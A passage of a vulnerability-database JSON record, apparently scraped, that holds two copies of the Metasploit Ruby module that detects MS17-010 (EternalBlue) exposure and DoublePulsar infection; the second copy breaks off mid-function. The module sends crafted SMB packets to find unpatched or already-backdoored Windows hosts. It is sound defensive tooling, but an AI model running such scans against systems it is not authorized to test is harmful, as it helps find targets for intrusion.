"2019-06-07T18:41:17", "references": [{"idList": ["KLA10977", "KLA10979"], "type": "kaspersky"}, {"idList": ["KITPLOIT:9146046356497464176"], "type": "kitploit"}, {"idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"], "type": "qualysblog"}, {"idList": ["THN:EA407B51944632C248FEB495594123EA", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:BC214880895281474C1A8EF7B7D98C13", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:2E043D9BAC04DEE81005124DD54A31E2"], "type": "thn"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"], "type": "malwarebytes"}, {"idList": ["MS17_010", "ETERNALBLUE"], "type": "canvas"}, {"idList": ["SMNTC-96705", "SMNTC-96709", "SMNTC-96707", "SMNTC-96706", "SMNTC-96704", "SMNTC-96703"], "type": "symantec"}, {"idList": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "type": "cve"}, {"idList": ["THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"], "type": "threatpost"}, {"idList": ["SSV:92952", "SSV:92964"], "type": "seebug"}, {"idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"], "type": "talosblog"}, {"idList": ["MYHACK58:62201786371"], "type": "myhack58"}, {"idList": ["NMAP:SMB-VULN-MS17-010.NSE"], "type": "nmap"}, {"idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/BROWSER/SIEMENS_SOLID_EDGE_SELISTCTRLX", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC"], "type": "metasploit"}, {"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:7E6831E46F8BB1882B752045F527ABE6", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A"], "type": "trendmicroblog"}, {"idList": ["MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8"], "type": "mmpc"}, {"idList": ["SECURELIST:9E27BB3C9444305AA7FFD267587363A1", "SECURELIST:CE501995262A06F4E132DE2F9C2B9B6C"], "type": "securelist"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698"], "type": "openvas"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:142181", "PACKETSTORM:142602", "PACKETSTORM:142548", "PACKETSTORM:142603"], "type": "packetstorm"}, {"idList": ["EDB-ID:41987", "EDB-ID:42030", "EDB-ID:41891", "EDB-ID:42031", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2", "AVLEONOV:C8B855FEC3E31BC28C624FF0B19272B7"], "type": "avleonov"}, {"idList": ["FIREEYE:399092589F455855881447C60B56C21A"], "type": "fireeye"}, {"idList": ["1337DAY-ID-27802", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-27803", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:2D677AA07C3BC24D8037E937830ACA0D", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:8F97D6443E5FED252FF64CE37A74709D"], "type": "saint"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}]}, "score": {"modified": "2019-06-07T18:41:17", "value": 4.4, "vector": "NONE"}}, "hash": "7f41373b73b89844d795a75d968d4fd4", "history": [], "href": "", "id": "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "lastseen": "2019-06-07T18:41:17", "metasploitHistory": "", "metasploitReliability": "", "modified": "2019-05-23T19:19:33", "objectVersion": "1.4", "published": "2017-03-29T22:24:59", "references": ["https://technet.microsoft.com/en-us/library/security/ms17-010.aspx", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0147", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0144", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0148", "https://github.com/countercept/doublepulsar-detection-script", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0145", "https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0146"], "reporter": "Rapid7", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::DCERPC\n include Msf::Exploit::Remote::SMB::Client\n include Msf::Exploit::Remote::SMB::Client::Authenticated\n include Msf::Exploit::Remote::SMB::Client::PipeAuditor\n\n include Msf::Auxiliary::Scanner\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'MS17-010 SMB RCE Detection',\n 'Description' => %q{\n Uses information disclosure to determine if MS17-010 has been patched or not.\n Specifically, it connects to the IPC$ tree and attempts a transaction on FID 0.\n If the status returned is \"STATUS_INSUFF_SERVER_RESOURCES\", the machine does\n not have the MS17-010 patch.\n\n If the machine is missing the MS17-010 patch, the module will check for an\n existing DoublePulsar (ring 0 shellcode/malware) infection.\n\n This module does not require valid SMB credentials in default server\n configurations. It can log on as the user \"\\\" and connect to IPC$.\n },\n 'Author' =>\n [\n 'Sean Dillon <sean.dillon@risksense.com>', # @zerosum0x0\n 'Luke Jennings' # DoublePulsar detection Python code\n ],\n 'References' =>\n [\n [ 'CVE', '2017-0143'],\n [ 'CVE', '2017-0144'],\n [ 'CVE', '2017-0145'],\n [ 'CVE', '2017-0146'],\n [ 'CVE', '2017-0147'],\n [ 'CVE', '2017-0148'],\n [ 'MSB', 'MS17-010'],\n [ 'URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\n [ 'URL', 'https://github.com/countercept/doublepulsar-detection-script'],\n [ 'URL', 'https://technet.microsoft.com/en-us/library/security/ms17-010.aspx']\n ],\n 'License' => MSF_LICENSE,\n 'Notes' =>\n {\n 'AKA' => [\n 'DOUBLEPULSAR',\n 'ETERNALBLUE'\n ]\n }\n ))\n\n register_options(\n [\n OptBool.new('CHECK_DOPU', [false, 'Check for DOUBLEPULSAR on vulnerable hosts', true]),\n OptBool.new('CHECK_ARCH', [false, 'Check for architecture on vulnerable hosts', true]),\n OptBool.new('CHECK_PIPE', [false, 'Check for named pipe on vulnerable hosts', false])\n ])\n end\n\n # algorithm to calculate the XOR Key for DoublePulsar knocks\n def calculate_doublepulsar_xor_key(s)\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\n x & 0xffffffff # this line was added just to truncate to 32 bits\n end\n\n # The arch is adjacent to the XOR key in the SMB signature\n def calculate_doublepulsar_arch(s)\n s == 0 ? 'x86 (32-bit)' : 'x64 (64-bit)'\n end\n\n def run_host(ip)\n checkcode = Exploit::CheckCode::Unknown\n\n begin\n ipc_share = \"\\\\\\\\#{ip}\\\\IPC$\"\n\n tree_id = do_smb_setup_tree(ipc_share)\n vprint_status(\"Connected to #{ipc_share} with TID = #{tree_id}\")\n\n status = do_smb_ms17_010_probe(tree_id)\n vprint_status(\"Received #{status} with FID = 0\")\n\n if status == \"STATUS_INSUFF_SERVER_RESOURCES\"\n os = simple.client.peer_native_os\n\n if datastore['CHECK_ARCH']\n case dcerpc_getarch\n when ARCH_X86\n os << ' x86 (32-bit)'\n when ARCH_X64\n os << ' x64 (64-bit)'\n end\n end\n\n print_good(\"Host is likely VULNERABLE to MS17-010! - #{os}\")\n\n checkcode = Exploit::CheckCode::Vulnerable\n\n report_vuln(\n host: ip,\n port: rport, # A service is necessary for the analyze command\n name: self.name,\n refs: self.references,\n info: \"STATUS_INSUFF_SERVER_RESOURCES for FID 0 against IPC$ - #{os}\"\n )\n\n # vulnerable to MS17-010, check for DoublePulsar infection\n if datastore['CHECK_DOPU']\n code, signature1, signature2 = do_smb_doublepulsar_probe(tree_id)\n\n if code == 0x51\n xor_key = calculate_doublepulsar_xor_key(signature1).to_s(16).upcase\n arch = calculate_doublepulsar_arch(signature2)\n print_warning(\"Host is likely INFECTED with DoublePulsar! - Arch: #{arch}, XOR Key: 0x#{xor_key}\")\n report_vuln(\n host: ip,\n name: \"MS17-010 DoublePulsar Infection\",\n refs: self.references,\n info: \"MultiPlexID += 0x10 on Trans2 request - Arch: #{arch}, XOR Key: 0x#{xor_key}\"\n )\n end\n end\n\n if datastore['CHECK_PIPE']\n pipe_name, _ = check_named_pipes(return_first: true)\n\n return unless pipe_name\n\n print_good(\"Named pipe found: #{pipe_name}\")\n\n report_note(\n host: ip,\n port: rport,\n proto: 'tcp',\n sname: 'smb',\n type: 'MS17-010 Named Pipe',\n data: pipe_name\n )\n end\n elsif status == \"STATUS_ACCESS_DENIED\" or status == \"STATUS_INVALID_HANDLE\"\n # STATUS_ACCESS_DENIED (Windows 10) and STATUS_INVALID_HANDLE (others)\n print_error(\"Host does NOT appear vulnerable.\")\n else\n print_error(\"Unable to properly detect if host is vulnerable.\")\n end\n\n rescue ::Interrupt\n print_status(\"Exiting on interrupt.\")\n raise $!\n rescue ::Rex::Proto::SMB::Exceptions::LoginError\n print_error(\"An SMB Login Error occurred while connecting to the IPC$ tree.\")\n rescue ::Exception => e\n vprint_error(\"#{e.class}: #{e.message}\")\n ensure\n disconnect\n end\n\n checkcode\n end\n\n def do_smb_setup_tree(ipc_share)\n connect\n\n # logon as user \\\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\n\n # connect to IPC$\n simple.connect(ipc_share)\n\n # return tree\n return simple.shares[ipc_share]\n end\n\n def do_smb_doublepulsar_probe(tree_id)\n # make doublepulsar knock\n pkt = make_smb_trans2_doublepulsar(tree_id)\n\n sock.put(pkt)\n bytes = sock.get_once\n\n # convert packet to response struct\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\n pkt.from_s(bytes[4..-1])\n\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\n end\n\n def do_smb_ms17_010_probe(tree_id)\n # request transaction with fid = 0\n pkt = make_smb_trans_ms17_010(tree_id)\n sock.put(pkt)\n bytes = sock.get_once\n\n # convert packet to response struct\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\n pkt.from_s(bytes[4..-1])\n\n # convert error code to string\n code = pkt['SMB'].v['ErrorClass']\n smberr = Rex::Proto::SMB::Exceptions::ErrorCode.new\n\n return smberr.get_error(code)\n end\n\n def make_smb_trans2_doublepulsar(tree_id)\n # make a raw transaction packet\n # this one is a trans2 packet, the checker is trans\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\n simple.client.smb_defaults(pkt['Payload']['SMB'])\n\n # opcode 0x0e = SESSION_SETUP\n setup = \"\\x0e\\x00\\x00\\x00\"\n setup_count = 1 # 1 word\n trans = \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n\n # calculate offsets to the SetupData payload\n base_offset = pkt.to_s.length + (setup.length) - 4\n param_offset = base_offset + trans.length\n data_offset = param_offset # + 0\n\n # packet baselines\n pkt['Payload']['SMB'].v['Command'] = Rex::Proto::SMB::Constants::SMB_COM_TRANSACTION2\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\n pkt['Payload']['SMB'].v['MultiplexID'] = 65\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\n pkt['Payload']['SMB'].v['TreeID'] = tree_id\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\n pkt['Payload'].v['Timeout'] = 0x00a4d9a6\n pkt['Payload'].v['ParamCountTotal'] = 12\n pkt['Payload'].v['ParamCount'] = 12\n pkt['Payload'].v['ParamCountMax'] = 1\n pkt['Payload'].v['DataCountMax'] = 0\n pkt['Payload'].v['ParamOffset'] = 66\n pkt['Payload'].v['DataOffset'] = 78\n\n pkt['Payload'].v['SetupCount'] = setup_count\n pkt['Payload'].v['SetupData'] = setup\n pkt['Payload'].v['Payload'] = trans\n\n pkt.to_s\n end\n\n def make_smb_trans_ms17_010(tree_id)\n # make a raw transaction packet\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_PKT.make_struct\n simple.client.smb_defaults(pkt['Payload']['SMB'])\n\n # opcode 0x23 = PeekNamedPipe, fid = 0\n setup = \"\\x23\\x00\\x00\\x00\"\n setup_count = 2 # 2 words\n trans = \"\\\\PIPE\\\\\\x00\"\n\n # calculate offsets to the SetupData payload\n base_offset = pkt.to_s.length + (setup.length) - 4\n param_offset = base_offset + trans.length\n data_offset = param_offset # + 0\n\n # packet baselines\n pkt['Payload']['SMB'].v['Command'] = Rex::Proto::SMB::Constants::SMB_COM_TRANSACTION\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\n pkt['Payload']['SMB'].v['Flags2'] = 0x2801 # 0xc803 would unicode\n pkt['Payload']['SMB'].v['TreeID'] = tree_id\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\n pkt['Payload'].v['ParamCountMax'] = 0xffff\n pkt['Payload'].v['DataCountMax'] = 0xffff\n pkt['Payload'].v['ParamOffset'] = param_offset\n pkt['Payload'].v['DataOffset'] = data_offset\n\n # actual magic: PeekNamedPipe FID=0, \\PIPE\\\n pkt['Payload'].v['SetupCount'] = setup_count\n pkt['Payload'].v['SetupData'] = setup\n pkt['Payload'].v['Payload'] = trans\n\n pkt.to_s\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/smb/smb_ms17_010.rb", "title": "MS17-010 SMB RCE Detection", "type": "metasploit", "viewCount": 3099}, "differentElements": ["published", "modified"], "edition": 23, "lastseen": "2019-06-07T18:41:17"}], "viewCount": 4246, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:146236", "PACKETSTORM:142548"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-27786"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810698", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:ILITIES/MSFT-CVE-2017-0146/"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "nessus", "idList": ["700059.PRM", "SMB_NT_MS17-010.NASL", "700099.PRM", "MS17-010.NASL"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0144", "CVE-2017-0143", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0145"]}, {"type": "symantec", "idList": ["SMNTC-96704", "SMNTC-96703", "SMNTC-96706", "SMNTC-96707", "SMNTC-96705", "SMNTC-96709"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0205", "CPAI-2017-0203", "CPAI-2017-0177", "CPAI-2017-0419", "CPAI-2017-0200", "CPAI-2017-0198"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "mmpc", "idList": ["MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02"]}, {"type": "threatpost", "idList": ["THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:F12E2167FDA829ED32C7A16A83B048BF"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143", "MS:CVE-2017-0145", "MS:CVE-2017-0148"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2020-08-20T01:40:28", "rev": 2}, "score": {"value": 4.8, "vector": "NONE", "modified": "2020-08-20T01:40:28", "rev": 2}}, "objectVersion": "1.5", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/smb/smb_ms17_010.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::DCERPC\n include Msf::Exploit::Remote::SMB::Client\n include Msf::Exploit::Remote::SMB::Client::Authenticated\n include Msf::Exploit::Remote::SMB::Client::PipeAuditor\n\n include Msf::Auxiliary::Scanner\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'MS17-010 SMB RCE Detection',\n 'Description' => %q{\n Uses information disclosure to determine if MS17-010 has been patched or not.\n Specifically, it connects to the IPC$ tree and attempts a transaction on FID 0.\n If the status returned is \"STATUS_INSUFF_SERVER_RESOURCES\", the machine does\n not have the MS17-010 patch.\n\n If the machine is missing the MS17-010 patch, the module will check for an\n existing DoublePulsar (ring 0 shellcode/malware) infection.\n\n This module does not require valid SMB credentials in default server\n configurations. It can log on as the user \"\\\" and connect to IPC$.\n },\n 'Author' =>\n [\n 'Sean Dillon <sean.dillon@risksense.com>', # @zerosum0x0\n 'Luke Jennings' # DoublePulsar detection Python code\n ],\n 'References' =>\n [\n [ 'CVE', '2017-0143'],\n [ 'CVE', '2017-0144'],\n [ 'CVE', '2017-0145'],\n [ 'CVE', '2017-0146'],\n [ 'CVE', '2017-0147'],\n [ 'CVE', '2017-0148'],\n [ 'MSB', 'MS17-010'],\n [ 'URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\n [ 'URL', 'https://github.com/countercept/doublepulsar-detection-script'],\n [ 'URL', 'https://technet.microsoft.com/en-us/library/security/ms17-010.aspx']\n ],\n 'License' => MSF_LICENSE,\n 'Notes' =>\n {\n 'AKA' => [\n 'DOUBLEPULSAR',\n 'ETERNALBLUE'\n ]\n }\n ))\n\n register_options(\n [\n OptBool.new('CHECK_DOPU', [false, 'Check for DOUBLEPULSAR on vulnerable hosts', true]),\n OptBool.new('CHECK_ARCH', [false, 'Check for architecture on vulnerable hosts', true]),\n OptBool.new('CHECK_PIPE', [false, 'Check for named pipe on vulnerable hosts', false])\n ])\n end\n\n # algorithm to calculate the XOR Key for DoublePulsar knocks\n def calculate_doublepulsar_xor_key(s)\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\n x & 0xffffffff # this line was added just to truncate to 32 bits\n end\n\n # The arch is adjacent to the XOR key in the SMB signature\n def calculate_doublepulsar_arch(s)\n s == 0 ? 'x86 (32-bit)' : 'x64 (64-bit)'\n end\n\n def run_host(ip)\n checkcode = Exploit::CheckCode::Unknown\n\n begin\n ipc_share = \"\\\\\\\\#{ip}\\\\IPC$\"\n\n tree_id = do_smb_setup_tree(ipc_share)\n vprint_status(\"Connected to #{ipc_share} with TID = #{tree_id}\")\n\n status = do_smb_ms17_010_probe(tree_id)\n vprint_status(\"Received #{status} with FID = 0\")\n\n if status == \"STATUS_INSUFF_SERVER_RESOURCES\"\n os = simple.client.peer_native_os\n\n if datastore['CHECK_ARCH']\n case dcerpc_getarch\n when ARCH_X86\n os << ' x86 (32-bit)'\n when ARCH_X64\n os << ' x64 (64-bit)'\n end\n end\n\n print_good(\"Host is likely VULNERABLE to MS17-010! - #{os}\")\n\n checkcode = Exploit::CheckCode::Vulnerable\n\n report_vuln(\n host: ip,\n port: rport, # A service is necessary for the analyze command\n name: self.name,\n refs: self.references,\n info: \"STATUS_INSUFF_SERVER_RESOURCES for FID 0 against IPC$ - #{os}\"\n )\n\n # vulnerable to MS17-010, check for DoublePulsar infection\n if datastore['CHECK_DOPU']\n code, signature1, signature2 = do_smb_doublepulsar_probe(tree_id)\n\n if code == 0x51\n xor_key = calculate_doublepulsar_xor_key(signature1).to_s(16).upcase\n arch = calculate_doublepulsar_arch(signature2)\n print_warning(\"Host is likely INFECTED with DoublePulsar! - Arch: #{arch}, XOR Key: 0x#{xor_key}\")\n report_vuln(\n host: ip,\n name: \"MS17-010 DoublePulsar Infection\",\n refs: self.references,\n info: \"MultiPlexID += 0x10 on Trans2 request - Arch: #{arch}, XOR Key: 0x#{xor_key}\"\n )\n end\n end\n\n if datastore['CHECK_PIPE']\n pipe_name, _ = check_named_pipes(return_first: true)\n\n return unless pipe_name\n\n print_good(\"Named pipe found: #{pipe_name}\")\n\n report_note(\n host: ip,\n port: rport,\n proto: 'tcp',\n sname: 'smb',\n type: 'MS17-010 Named Pipe',\n data: pipe_name\n )\n end\n elsif status == \"STATUS_ACCESS_DENIED\" or status == \"STATUS_INVALID_HANDLE\"\n # STATUS_ACCESS_DENIED (Windows 10) and STATUS_INVALID_HANDLE (others)\n print_error(\"Host does NOT appear vulnerable.\")\n else\n print_error(\"Unable to properly detect if host is vulnerable.\")\n end\n\n rescue ::Interrupt\n print_status(\"Exiting on interrupt.\")\n raise $!\n rescue ::Rex::Proto::SMB::Exceptions::LoginError\n print_error(\"An SMB Login Error occurred while connecting to the IPC$ tree.\")\n rescue ::Exception => e\n vprint_error(\"#{e.class}: #{e.message}\")\n ensure\n disconnect\n end\n\n checkcode\n end\n\n def do_smb_setup_tree(ipc_share)\n connect(versions: [1])\n\n # logon as user \\\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\n\n # connect to IPC$\n simple.connect(ipc_share)\n\n # return tree\n return simple.shares[ipc_share]\n end\n\n def do_smb_doublepulsar_probe(tree_id)\n # make doublepulsar knock\n pkt = make_smb_trans2_doublepulsar(tree_id)\n\n sock.put(pkt)\n bytes = sock.get_once\n\n # convert packet to response struct\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\n pkt.from_s(bytes[4..-1])\n\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\n end\n\n def do_smb_ms17_010_probe(tree_id)\n # request transaction with fid = 0\n pkt = make_smb_trans_ms17_010(tree_id)\n sock.put(pkt)\n bytes = sock.get_once\n\n # convert packet to response struct\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\n pkt.from_s(bytes[4..-1])\n\n # convert error code to string\n code = pkt['SMB'].v['ErrorClass']\n smberr = Rex::Proto::SMB::Exceptions::ErrorCode.new\n\n return smberr.get_error(code)\n end\n\n def make_smb_trans2_doublepulsar(tree_id)\n # make a raw transaction packet\n # this one is a trans2 packet, the checker is trans\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\n simple.client.smb_defaults(pkt['Payload']['SMB'])\n\n # opcode 0x0e = SESSION_SETUP\n setup = \"\\x0e\\x00\\x00\\x00\"\n setup_count = 1 # 1 word\n trans = \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n\n # calculate offsets to the SetupData payload\n base_offset = pkt.to_s.length + (setup.length) - 4\n param_offset = base_offset + trans.length\n data_offset = param_offset # + 0\n\n # packet baselines\n pkt['Payload']['SMB'].v['Command'] = Rex::Proto::SMB::Constants::SMB_COM_TRANSACTION2\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\n pkt['Payload']['SMB'].v['MultiplexID'] = 65\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\n pkt['Payload']['SMB'].v['TreeID'] = tree_id\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\n pkt['Payload'].v['Timeout'] = 0x00a4d9a6\n pkt['Payload'].v['ParamCountTotal'] = 12\n pkt['Payload'].v['ParamCount'] = 12\n pkt['Payload'].v['ParamCountMax'] = 1\n pkt['Payload'].v['DataCountMax'] = 0\n pkt['Payload'].v['ParamOffset'] = 66\n pkt['Payload'].v['DataOffset'] = 78\n\n pkt['Payload'].v['SetupCount'] = setup_count\n pkt['Payload'].v['SetupData'] = setup\n pkt['Payload'].v['Payload'] = trans\n\n pkt.to_s\n end\n\n def make_smb_trans_ms17_010(tree_id)\n # make a raw transaction packet\n pkt 